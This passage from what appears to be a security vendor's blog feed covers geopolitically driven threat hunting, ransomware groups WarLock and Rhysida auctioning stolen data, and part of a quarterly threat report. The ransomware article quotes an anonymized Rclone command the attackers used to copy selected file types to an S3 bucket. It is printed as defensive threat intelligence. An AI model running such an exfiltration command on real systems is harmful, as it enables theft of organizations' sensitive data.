</p><p>On a technical level, the first warning signs manifest in one or more of the following ways: </p><ul><li>An increase in sector-specific phishing attacks linked to political events</li><li>The reactivation of known command and control infrastructures</li><li>The formation of new politically-motivated hacktivist collectives</li><li>Access intermediaries launching campaigns to sell access points in sectors linked to ongoing conflicts</li></ul><p>Internally, organizations may sometimes observe unusual activity from cybersecurity teams, such as unexpected code updates from maintenance managers located in politically sensitive regions, vendor outages correlated with geopolitical developments, or authentication anomalies linked to regions near ongoing crises. The most important pattern to recognize is convergence: when political escalation, external surveillance, and internal anomalies appear within the same time frame, organizations must assume that threat conditions have shifted from background noise to active risk and immediately adopt a strengthened defensive posture.</p><h2>Adjusting defensive posture during geopolitical instability</h2><p>Harden identity infrastructure against state-grade threats.</p><p>Identity has become a frontline asset in geopolitical conflict. In today’s environment, the boundaries between hacktivism, cybercrime, and state-sponsored activities are increasingly blurred, with governments at times guiding or amplifying these operations. Credential compromise is often the entry point that enables these broader campaigns. To mitigate this risk, organizations should enforce universal, phishing-resistant MFA, regularly review and tightly govern privileged roles, particularly in sensitive geographies, and adopt just-in-time access to minimize standing privileges. These measures materially reduce exposure and strengthen resilience against sophisticated, geopolitically motivated threat actors.</p><h3>Conduct targeted threat hunts</h3><ul><li>Russia — Russian threat actors place a strong emphasis on disruption and destruction, particularly during periods of geopolitical conflict. They commonly deploy wiper malware that deletes or corrupts files and often pretend it’s ransomware. Threat hunters should watch for sudden mass file changes, system reboots, or the use of admin-level command-line tools immediately preceding damage. Russia also has advanced capabilities for ICS/OT manipulation, meaning unusual access to industrial controllers or configuration changes can be a strong indicator of potential compromise. Additionally, their operations often support information warfare, so defenders should look for compromised media or government accounts, unauthorized website changes, and targeted spear-phishing attacks tied to political events.</li></ul><ul><li>China — China focuses on long-term, stealthy access rather than quick disruption. They are known for supply-chain compromises, so unusual activity from vendor accounts or anomalies in software updates should be investigated. They frequently abuse cloud identity platforms, making it essential to monitor for impossible travel logins, token theft, MFA fatigue, or suspicious OAuth applications. Chinese groups also invest heavily in credential harvesting, often trying to quietly collect usernames, passwords, and tokens over long periods. Threat hunters should look for password spraying, attempts to dump credentials, or lateral movement linked to service or personal accounts that generally don’t access sensitive systems.</li></ul><ul><li>Iran — Iranian threat actors tend to be opportunistic and politically reactive, relying heavily on broad phishing campaigns. Organizations should monitor for spikes in failed logins, newly created email forwarding rules, and look-alike phishing domains. Iran also frequently conducts website defacements, so signs such as unexpected CMS admin logins, unauthorized web content changes, or DNS tampering are essential to hunt for. While generally less sophisticated than Russia or China, they can still deploy destructive malware, meaning defenders should watch for scripts or tools that mass-delete or encrypt files, suspicious scheduled tasks, and activity involving commodity RATs or .NET tools.</li></ul><ul><li>North Korea — North Korea’s cyber operations are primarily financially motivated, with a strong focus on cryptocurrency theft. Threat hunters should monitor for unauthorized access to wallet systems, unusual outbound connections to cryptocurrency platforms, or abnormal API calls associated with blockchain activity. They also excel at social engineering, especially targeting finance, HR, and engineering staff by posing as recruiters or job candidates. Indicators include suspicious attachments, communication from personal email accounts, or new “contractor” accounts accessing code or financial systems. Once inside a network, their activity is typically driven by exfiltration, so large or stealthy data transfers, especially to cloud storage or foreign VPNs, are significant warning signs.</li></ul><h3>Reprioritize assets exposed to geopolitical pressure.</h3><p>Identify systems and identities that become high-value targets during periods of geopolitical tension, especially those associated with sensitive regions or government-linked operations. Immediately harden them with faster patching, tighter segmentation, stricter east–west controls, and increased telemetry to concentrate defenses where state-aligned actors are most likely to strike.</p><p>Reduce external exposure on high-value frontiers.</p><p>Reduce the attack surface by removing access paths favored by advanced adversaries. Disable legacy VPNs, retire unmonitored jump servers, tighten SSO/IdP trust paths, and eliminate unnecessary remote-admin or broad cloud access routes. Reducing weak entry points raises the cost of initial access for foreign intelligence units.</p><h3>Harden response capabilities</h3><p>Incident response teams must prepare for an increased likelihood of destructive or politically motivated attacks. Organizations should test their data destruction and destructive attack plans, validate their disaster recovery timelines, and ensure the restoration of offline or immutable backups. Management must be kept informed of evolving geopolitical risks, and cross-functional teams, including cybersecurity, legal, communications, and operations, must conduct crisis simulation exercises. Rapid response structures, such as crisis management teams, should be ready to be activated to facilitate fast decision-making under pressure. These measures are intended to help ensure that the organization can respond effectively even in the face of significant stress or disruption.</p><h2>Building a geopolitical cyber attack surface map</h2><p>Building a geopolitical map of the attack surface enables organizations to anticipate how political conditions may impact cyber risk. This involves understanding how people, technology, and third-party relationships are geographically distributed, and how those distributions intersect with jurisdictions that may impose legal, operational, or conflict-related risks. A robust map also integrates geopolitical assessments with business impact and criticality, enabling organizations to see where instability or state control could affect privileged access, essential services, or sensitive data. </p><p>The following steps describe how to perform an attack surface mapping based on geopolitical events. These steps are not derived from any single framework or source; they are a practical blend of best practices for mapping infrastructure, assessing geopolitical exposure, identifying weak points, and prioritizing remediation.</p><ul><li><strong>Map Internal Workforce</strong>: Create an authoritative inventory of the physical locations of all employees with technical or elevated privileges. Include full-time staff, contractors, and outsourced teams. Use HR, IAM, and staffing records to ensure accuracy and maintain updates as personnel relocate or roles change.</li><li><p><strong>Map Infrastructure</strong>: Create a comprehensive list of regions that host your cloud services, data centers, disaster recovery sites, and replication routes. Document which workloads reside where, how traffic moves between regions, and what operational responsibilities each location carries. Capture both primary and failover arrangements.</p></li></ul><ul><li><strong>Map Vendor & Subcontractor</strong>: This step requires suppliers to disclose the actual countries where engineering, customer support, managed services, and subcontracted tasks are performed. Validate this information through audits, questionnaires, or contractual obligations. Record each operational footprint, not just corporate registration locations.</li></ul><ul><li><strong>Geopolitical Risk Scores</strong>: Apply a standardized scoring model to each region (e.g., Matteo Iacoviello Geopolitical Risk (GPR) index, BlackRock Geopolitical Risk Indicator (BGRI), or Bloomberg’s geopolitical risk scores). Inputs may include government stability indicators, international sanctions status, regulatory pressures, history of state intervention, and exposure to espionage or cyber operations. Use a consistent scoring range.</li></ul><ul><li><strong>Overlay Business Criticality</strong>: Cross-reference each region’s risk score with the operational value of what that region supports. Identify where highly sensitive systems, privileged roles, or essential processes are located in areas with higher risk. Highlight areas where disruption would impact business continuity or security posture.</li></ul><ul><li><strong>Identify Regional Strategic Points</strong>: Look for dependencies where a single region hosts an excessive number of critical people, systems, or vendors. This includes cloud regions serving multiple core workloads, a subcontractor with a heavily centralized team, or a country where several key staff reside. Flag these for targeted risk discussions.</li></ul><ul><li><strong>Prioritize Remediation Measures</strong>: Develop a ranked set of actions based on the combined geopolitical and business impact. Potential responses include redistributing workloads across safer regions, shifting privileged roles, tightening access controls, enhancing monitoring for at-risk locations, or preparing contingency plans for rapid relocation or provider transition.</li></ul><h2>Conclusion</h2><p>Geopolitics is now a key driver of cyber risk, redefining attacker profiles, motivations, and the organizations targeted and/or affected by collateral damage. Many vulnerabilities in modern businesses stem not from technical misconfigurations, but from the geopolitical interconnectedness of global supply chains, cloud architectures, distributed teams, and open-source ecosystems. </p><p>Traditional cybersecurity controls remain essential, but are insufficient on their own as they fail to account for laws, political incentives, national strategies, and human vulnerabilities influenced by the world's most active cyber powers. To manage this reality, organizations must integrate geopolitical analysis into every layer  of their security decision-making process, consider geography as a key security variable, and develop the agility to proactively adapt their posture to the evolving global context. </p>]]></description>
      <link>https://www.rapid7.com/blog/post/it-geopolitics-and-cyber-risk-how-global-tensions-shape-the-attack-surface</link>
      <guid isPermaLink="false">blt9895ff287250b1a9</guid>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Risk Management]]></category><dc:creator><![CDATA[Jeremy Makowski]]></dc:creator>
      <pubDate>Thu, 11 Dec 2025 10:01:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt84fc13ef315b792d/693aa2d4a84fc68590a09a67/rapid7-geopolitics.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[From Extortion to E-commerce: How Ransomware Groups Turn Breaches into Bidding Wars]]></title>
      <description><![CDATA[<p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Ransomware has evolved from simple digital extortion into a structured, profit-driven criminal enterprise. Over time, it has led to the development of a complex ecosystem where stolen data is not only leveraged for ransom, but also sold to the highest bidder. This trend first gained traction in 2020 when the Pinchy Spider group, better known as REvil, pioneered the practice of hosting data auctions on the dark web, opening a new chapter in the commercialization of cybercrime.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>In 2025, contemporary groups such as WarLock and Rhysida have embraced similar tactics, further normalizing data auctions as part of their extortion strategies. By opening additional profit streams and attracting more participants, these actors are amplifying both the frequency and impact of ransomware operations. The rise of data auctions reflects a maturing underground economy, one that mirrors legitimate market behavior, yet drives the continued expansion and professionalization of global ransomware activity.</span></p><h2>Anatomy of victim data auctions </h2><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Most modern ransomware groups employ double extortion tactics, exfiltrating data from a victim’s network before deploying encryption. Afterward, they publicly claim responsibility for the attack and threaten to release the stolen data unless their ransom demand is met. This dual-pressure technique significantly increases the likelihood of payment.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>In recent years, data-only extortion campaigns, in which actors forgo encryption altogether, have risen sharply. In fact, such incidents doubled in 2025, highlighting how the threat of data exposure alone has become an effective extortion lever. Most ransomware operations, however, continue to use encryption as part of their attack chain.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Certain ransomware groups have advanced this strategy by introducing data auctions when ransom negotiations with victims fail. In these cases, threat actors invite potential buyers, such as competitors or other interested parties, to bid on the stolen data, often claiming it will be sold exclusively to a single purchaser. In some instances, groups have been observed selling partial datasets, likely adjusted to a buyer’s specific budget or area of interest, while any unsold data is typically published on dark web leak sites.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>This process is illustrated in Figure 1, under the assumption that the threat actor adheres to their stated claims. However, in practice, there is no guarantee that the stolen data will remain undisclosed, even if the ransom is paid. This highlights the inherent unreliability of negotiating with cybercriminals.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf34ddf7167c8a7bf/69246a5fb054896d6a03d693/extortion-ecommerce-diagram_(1).jpg" height="438" alt="ransomware-extortion-ecommerce-diagram" caption="Figure 1 - Victim data auctioning process" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="ransomware-extortion-ecommerce-diagram" width="718" max-width="718" max-height="438" style="max-width: 718px; width: 718px; max-height: 438px; height: 438px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf34ddf7167c8a7bf/69246a5fb054896d6a03d693/extortion-ecommerce-diagram_(1).jpg" data-sys-asset-uid="bltf34ddf7167c8a7bf" data-sys-asset-filename="extortion-ecommerce-diagram_(1).jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 1 - Victim data auctioning process" data-sys-asset-alt="ransomware-extortion-ecommerce-diagram" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 1 - Victim data auctioning process</figcaption></div></figure><p>⠀</p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>This auction model provides an additional revenue stream, enabling ransomware groups to profit from exfiltrated data even when victims refuse to pay. It should be noted, however, that such auctions are often reserved for high-profile incidents. In these cases, the threat actors exploit the publicity surrounding attacks on prominent organizations to draw attention, attract potential buyers, and justify higher starting bids.</span></p><p style="text-align: justify;direction: ltr;">This trend is likely driven by the fragmentation of the ransomware ecosystem following the recent disruption of prominent threat actors, including 8Base and BlackSuit. This shift in cybercrime dynamics is compelling smaller, more agile groups to aggressively compete for visibility and profit through auctions and private sales to maintain financial viability. The emergence of the Crimson Collective in October 2025 exemplified this dynamic when the group auctioned stolen datasets to the highest bidder. Although short-lived, this incident served as a proof of concept (PoC) for the growing viability of monetizing data exfiltration independently of traditional ransom schemes.</p><h2>Threat actor spotlight</h2><h3>WarLock</h3><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>The WarLock ransomware group has been active since at least June 2025. The group targets organizations across North America, Europe, Asia, and Africa, spanning sectors from technology to critical infrastructure. Since its emergence, WarLock has rapidly gained prominence for its repeated exploitation of vulnerable Microsoft SharePoint servers, leveraging newly disclosed vulnerabilities to gain initial access to targeted systems.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>The group adopts double extortion tactics, exfiltrating data from the victim’s systems before deploying its ransomware variant. From a recent incident Rapid7 responded to, we observed the threat actor exfiltrating the data from a victim to an S3 bucket using the tool Rclone. An anonymized version of the command used by the threat actor can be found below:</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><em>Rclone.exe copy \\localdirectory :s3 -P --include "*.{pdf,ai,dwg,dxf,dwt,doc,docx,dwg,dwt,dws,shx,pat,lin,ctb,dxf,dwf,step,stl,dst,dxb,,stp,ipt,prt,iges,obj,xlsx,mdf,sql,doc,xls,sql,bak,sqlite,db,sqlite3,sdf,ndf,ldf,csv,mdf,dbf,ibd,myd,ppt,pptx}" -q --ignore-existing --auto-confirm --multi-thread-streams 11 --transfers 11 --max-age 500d --max-size 2000m</em></span></span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>WarLock operates a dedicated leak site (DLS) on the dark web, where it lists its victims. From the outset of its operations, the group has auctioned stolen data, publishing only the unsold information online (Figure 2). The group further mentions that the exfiltrated data may be sold to third parties if the victim refuses to pay in their ransom note (Figure 3).</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltebb5c7f143bce7b9/69246f2daf699d40dbe18506/2-ransomware-purchased-data.png" alt="2-ransomware-purchased-data.png" caption="Figure 2 - Example of purchased data" height="275" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="2-ransomware-purchased-data.png" width="721" max-width="721" max-height="275" style="max-width: 721px; width: 721px; max-height: 275px; height: 275px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltebb5c7f143bce7b9/69246f2daf699d40dbe18506/2-ransomware-purchased-data.png" data-sys-asset-uid="bltebb5c7f143bce7b9" data-sys-asset-filename="2-ransomware-purchased-data.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2 - Example of purchased data" data-sys-asset-alt="2-ransomware-purchased-data.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 2 - Example of purchased data</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd3698baa8af09fb5/69246f2d2bfe5b6d5e3ef526/3-warlock-ransomware-ransom-note.png" alt="3-warlock-ransomware-ransom-note.png" caption="Figure 3 - WarLock ransom note" height="164" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="3-warlock-ransomware-ransom-note.png" width="723" max-width="723" max-height="164" style="max-width: 723px; width: 723px; max-height: 164px; height: 164px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd3698baa8af09fb5/69246f2d2bfe5b6d5e3ef526/3-warlock-ransomware-ransom-note.png" data-sys-asset-uid="bltd3698baa8af09fb5" data-sys-asset-filename="3-warlock-ransomware-ransom-note.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3 - WarLock ransom note" data-sys-asset-alt="3-warlock-ransomware-ransom-note.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 3 - WarLock ransom note</figcaption></div></figure><p>⠀</p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Although WarLock shares updates on the progress and results of these auctions through its DLS, it also relies heavily on its presence on the RAMP4 cybercrime forum to attract potential buyers (Figure 4). This approach likely allows WarLock to reach a wider buyer base by publishing these posts under the relevant thread “Auction \ 拍卖会”. It should be noted that WarLock is assessed to be of Chinese origin, which is further supported by the Chinese-language reference in this thread title.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb1f7bd7be0fa6797/69246f2dd72d26596aafbeca/4-ransomware-auction-warlock.png" height="403" alt="4-ransomware-auction-warlock.png" caption="Figure 4 - Mention of an auction on WarLock’s DLS" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="4-ransomware-auction-warlock.png" width="727" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb1f7bd7be0fa6797/69246f2dd72d26596aafbeca/4-ransomware-auction-warlock.png" data-sys-asset-uid="bltb1f7bd7be0fa6797" data-sys-asset-filename="4-ransomware-auction-warlock.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4 - Mention of an auction on WarLock’s DLS" data-sys-asset-alt="4-ransomware-auction-warlock.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 4 - Mention of an auction on WarLock’s DLS</figcaption></div></figure><p>⠀</p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Using the alias “cnkjasdfgd,” the group advertises details about the nature and volume of exfiltrated data, along with sample files (Figure 5). WarLock further directs interested buyers to its Tox account, a peer-to-peer encrypted messaging and video-calling platform, where the auctions appear to take place.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt42b22e609334b7a0/69246f2e2b28371f24b49a8d/5-warlock-ramp4.png" height="359" alt="5-warlock-ramp4.png" caption="Figure 5 - WarLock’s post on RAMP4" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="5-warlock-ramp4.png" width="730" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt42b22e609334b7a0/69246f2e2b28371f24b49a8d/5-warlock-ramp4.png" data-sys-asset-uid="blt42b22e609334b7a0" data-sys-asset-filename="5-warlock-ramp4.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 5 - WarLock’s post on RAMP4" data-sys-asset-alt="5-warlock-ramp4.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 5 - WarLock’s post on RAMP4</figcaption></div></figure><p>⠀</p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>This approach appears to be highly effective for WarLock. Despite being a recent entrant to the ransomware ecosystem, the group has reportedly sold victim data in approximately 55% of its claimed attacks, accounting for 55 victims to date as of November 2025, demonstrating significant traction within underground markets. The remaining victims’ data has been publicly released on the group’s DLS, following unsuccessful ransom negotiations and a lack of interested buyers.</span></p><h3>Rhysida</h3><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>The Rhysida ransomware group was first identified by cybersecurity researchers in May 2023. The group primarily targets Windows operating systems across both public and private organizations in sectors such as government, defense, education, and manufacturing. Its operations have been observed in several countries, including the United Kingdom, Switzerland, Australia, and Chile. The threat actors portray themselves as a so-called “cybersecurity team” that assists organizations in securing their networks by exposing system vulnerabilities.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Rhysida maintains an active DLS, where it publishes data belonging to victims who refuse to pay the ransom, in alignment with double extortion tactics. Since at least June 2023, the group has also conducted data auctions via a dedicated “Auctions Online” section of its DLS. These auctions typically run for seven days, and Rhysida claims that each dataset is sold exclusively to a single buyer. As of mid-October 2025, the group was hosting five ongoing auctions, with starting prices ranging from 5 to 10 Bitcoin (Figure 6).</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbff44f7770ccf830/69246f2d25f1f4fc723c0b8c/6-ransomware-auction-rhysida-dls.png" alt="6-ransomware-auction-rhysida-dls.png" caption="Figure 6 - Example of an auction on Rhysida’s DLS" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="6-ransomware-auction-rhysida-dls.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbff44f7770ccf830/69246f2d25f1f4fc723c0b8c/6-ransomware-auction-rhysida-dls.png" data-sys-asset-uid="bltbff44f7770ccf830" data-sys-asset-filename="6-ransomware-auction-rhysida-dls.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 6 - Example of an auction on Rhysida’s DLS" data-sys-asset-alt="6-ransomware-auction-rhysida-dls.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 6 - Example of an auction on Rhysida’s DLS</figcaption></div></figure><p>⠀</p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Once the auction period ends, Rhysida publicly releases any unsold data on its DLS (Figure 7). Instead, if the auction is successful, the data is marked as “sold”, without being released on the group’s DLS (Figure 8). In many cases, the group publishes only a subset of the stolen data, often accompanied by the note “not sold data was published” (Figure 9).</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt769705e9285f0e07/69246f2eb05489c43e03d6f7/7-data-release-ransomware-rhysida.png" height="459" alt="7-data-release-ransomware-rhysida.png" caption="Figure 7 - Example of full data release on Rhysida’s DLS " class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="7-data-release-ransomware-rhysida.png" width="712" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt769705e9285f0e07/69246f2eb05489c43e03d6f7/7-data-release-ransomware-rhysida.png" data-sys-asset-uid="blt769705e9285f0e07" data-sys-asset-filename="7-data-release-ransomware-rhysida.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 7 - Example of full data release on Rhysida’s DLS" data-sys-asset-alt="7-data-release-ransomware-rhysida.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 7 - Example of full data release on Rhysida’s DLS</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9214ab94a22a4565/69246f2e33936a027ee5d854/8-sold-data-rhysida.png" height="189" alt="8-sold-data-rhysida.png" caption="Figure 8 - Example of sold data on Rhysida’s DLS" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="8-sold-data-rhysida.png" width="714" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9214ab94a22a4565/69246f2e33936a027ee5d854/8-sold-data-rhysida.png" data-sys-asset-uid="blt9214ab94a22a4565" data-sys-asset-filename="8-sold-data-rhysida.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8 - Example of sold data on Rhysida’s DLS" data-sys-asset-alt="8-sold-data-rhysida.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 8 - Example of sold data on Rhysida’s DLS</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfb93b2360fc19c6a/69247387c3599f720c8f8cb1/9-partial-data-release-rhysida-ransomware.png" height="186" alt="9-partial-data-release-rhysida-ransomware.png" caption="Figure 9 - Example of partial data release on Rhysida’s DLS" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="9-partial-data-release-rhysida-ransomware.png" width="719" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfb93b2360fc19c6a/69247387c3599f720c8f8cb1/9-partial-data-release-rhysida-ransomware.png" data-sys-asset-uid="bltfb93b2360fc19c6a" data-sys-asset-filename="9-partial-data-release-rhysida-ransomware.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9 - Example of partial data release on Rhysida’s DLS" data-sys-asset-alt="9-partial-data-release-rhysida-ransomware.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 9 - Example of partial data release on Rhysida’s DLS</figcaption></div></figure><p>⠀</p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>With 224 claimed attacks to date as of November 2025, approximately 67% resulting in full or partial data sales, auctions represent a significant additional revenue stream for Rhysida. The group’s auction model appears to be considerably more effective than WarLock’s (Figure 10), likely due to Rhysida’s established reputation within the cybercrime ecosystem and its involvement in several high-profile attacks.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc0823c731dd9b817/69246f2e179d4339f532d78d/10-ransomware-auction-outcomes-graph-chart.png" height="446" alt="10-ransomware-auction-outcomes-graph-chart.png" caption="Figure 10 -  Overview of auction outcomes" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="10-ransomware-auction-outcomes-graph-chart.png" width="721" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc0823c731dd9b817/69246f2e179d4339f532d78d/10-ransomware-auction-outcomes-graph-chart.png" data-sys-asset-uid="bltc0823c731dd9b817" data-sys-asset-filename="10-ransomware-auction-outcomes-graph-chart.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 10 -  Overview of auction outcomes" data-sys-asset-alt="10-ransomware-auction-outcomes-graph-chart.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 10 -  Overview of auction outcomes</figcaption></div></figure><h2>Conclusion</h2><p style="text-align: justify;direction: ltr;">The cyber extortion ecosystem is undergoing a profound transformation, shifting from traditional ransom payments to a diversified, market-driven model centered on data auctions and direct sales. This evolution marks a turning point in how ransomware groups generate revenue, transforming what were once isolated extortion incidents into structured commercial transactions.</p><p style="text-align: justify;direction: ltr;">Groups such as WarLock and Rhysida exemplify this shift, illustrating how ransomware operations increasingly mirror illicit e-commerce ecosystems. By auctioning exfiltrated data, these actors not only create additional revenue streams but also reduce their dependence on ransom compliance, monetizing stolen data even when victims refuse to pay. This approach has proven particularly lucrative for these threat actors, likely setting a precedent for newer extortion groups eager to replicate their success.</p><p style="text-align: justify;direction: ltr;">As a result, proprietary and sensitive data, including personally identifiable and financial information, is flooding dark web marketplaces at an unprecedented pace. This expanding secondary market intensifies both the operational and reputational risks faced by affected organizations, extending the impact of an attack well beyond its initial compromise.</p><p style="text-align: justify;direction: ltr;">To adapt to this evolving threat landscape, organizations must move beyond reactive crisis management and embrace a proactive, intelligence-driven defense strategy. Continuous dark web monitoring, early breach detection, and the integration of cyber threat intelligence into response workflows are now essential. In a world where stolen data functions as a tradable commodity, resilience depends not on negotiation but on vigilance, preparedness, and rapid action.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-extortion-ecommerce-ransomware-groups-turn-breaches-into-bidding-wars-research</link>
      <guid isPermaLink="false">bltf625ee34a3104ee0</guid>
      <category><![CDATA[Ransomware]]></category>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Dark Web]]></category><dc:creator><![CDATA[Alexandra Blia]]></dc:creator>
      <pubDate>Mon, 24 Nov 2025 14:21:37 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf3ae6fb8e07d88e0/67ee88468d0b99031be0ea84/resources-research.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Attackers accelerate, adapt, and automate: Rapid7’s Q3 2025 Threat Landscape Report]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>The </span><a href="https://www.rapid7.com/research/report/threat-landscape-report-2025-q3/" target="_blank"><span style='font-size: undefined;'>Q3 2025 Threat Landscape Report</span></a><span style='font-size: undefined;'>, authored by the Rapid7 Labs team, paints a clear picture of an environment where attackers are moving faster, working smarter, and using artificial intelligence to stay ahead of defenders. The findings reveal a threat landscape defined by speed, coordination, and innovation.</span>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The quarter showed how quickly exploitation now follows disclosure: Rapid7 observed newly reported vulnerabilities weaponized within days, if not hours, leaving organizations little time to patch before attackers struck. Critical business platforms and third-party integrations were frequent targets, as adversaries sought direct paths to disruption. Ransomware remained a most visible threat, but the nature of these operations continued to evolve.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Groups such as Qilin, Akira, and INC Ransom drove much of the activity, while others went quiet, rebranded, or merged into larger collectives. The overall number of active groups increased compared to the previous quarter, signaling renewed energy across the ransomware economy. Business services, manufacturing, and healthcare organizations were the most affected, with the majority of incidents occurring in North America.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Many newer actors opted for stealth, limiting public exposure by leaking fewer victim details, opting for “information-lite” screenshots in an effort to thwart law enforcement. Some established groups built alliances and shared infrastructure to expand reach such as Qilin extending its influence through partnerships with DragonForce and LockBit. Meanwhile, SafePay gained ground by running a fully in-house, hands-on model avoiding inter-party duelling and law enforcement. These trends show how ransomware has matured into a complex, service-based ecosystem.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Nation-state operations in Q3 favored persistence and stealth over disruption. Russian, Chinese, Iranian, and North Korean-linked groups maintained long-running campaigns. Many targeted identity systems, telecom networks, and supply chains. Rapid7’s telemetry showed these actors shrinking the window between disclosure and exploitation and relying on legitimate synchronization processes to remain hidden for months. The result: attacks that are harder to spot and even harder to contain.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Threat actors are fully operationalizing AI to enhance deception, automate intrusions, and evade detection. Generative tools now power realistic phishing, deepfake vishing, influence operations, and adaptive malware like LAMEHUG. This means the theoretical risk of AI has been fully operationalized. Defenders must now assume attackers are using these tools and techniques against them and not just supposing they are. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This is but a taste of the valuable threat information the report has to offer. In addition to deeper dives on the subjects above, the threat report includes analysis of some of the most common compromise vectors, new vulnerabilities and existing ones still favored by attackers, and, of course, our recommendations to safeguard against compromises across your entire attack surface. </span></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Want to learn more? 